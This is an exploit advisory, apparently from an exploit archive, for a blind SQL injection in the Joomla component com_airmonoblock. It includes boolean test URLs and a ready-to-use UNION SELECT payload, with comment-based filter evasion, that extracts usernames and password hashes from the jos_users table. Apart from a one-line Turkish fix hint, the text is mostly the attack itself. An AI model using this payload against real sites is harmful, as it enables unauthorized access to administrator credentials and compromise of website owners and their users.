35 lines
No EOL
1.1 KiB
Text
35 lines
No EOL
1.1 KiB
Text
<------------------- header data start ------------------- >
|
|
|
|
#############################################################
|
|
# Joomla Component com_airmonoblock Blind SQL Injection Vulnerability
|
|
#############################################################
|
|
|
|
# Author : Pyske
|
|
|
|
# Home : www.cyber-warrior.org
|
|
|
|
# Greetz : Fl0riX , M-K-A and All Cyber-Warrior
|
|
|
|
# Name : com_airmonoblock
|
|
|
|
# Bug Type : Blind SQL Injection
|
|
|
|
# Infection : Admin login bilgileri alinabilir.
|
|
|
|
# Demo Vuln. :
|
|
TRUE(+)
|
|
http://server/index2.php?option=com_airmonoblock&task=focus&id=1 and 1=1
|
|
FALSE(-)
|
|
http://server/index2.php?option=com_airmonoblock&task=focus&id=1 and 1=0
|
|
|
|
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
|
|
|
|
#############################################################
|
|
|
|
< ------------------- header data end of ------------------- >
|
|
|
|
< -- bug code start -- >
|
|
|
|
path/ index2.php?option=com_airmonoblock&task=focus&id=1/**/and/**/1=0/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--
|
|
|
|
< -- bug code end of -- > |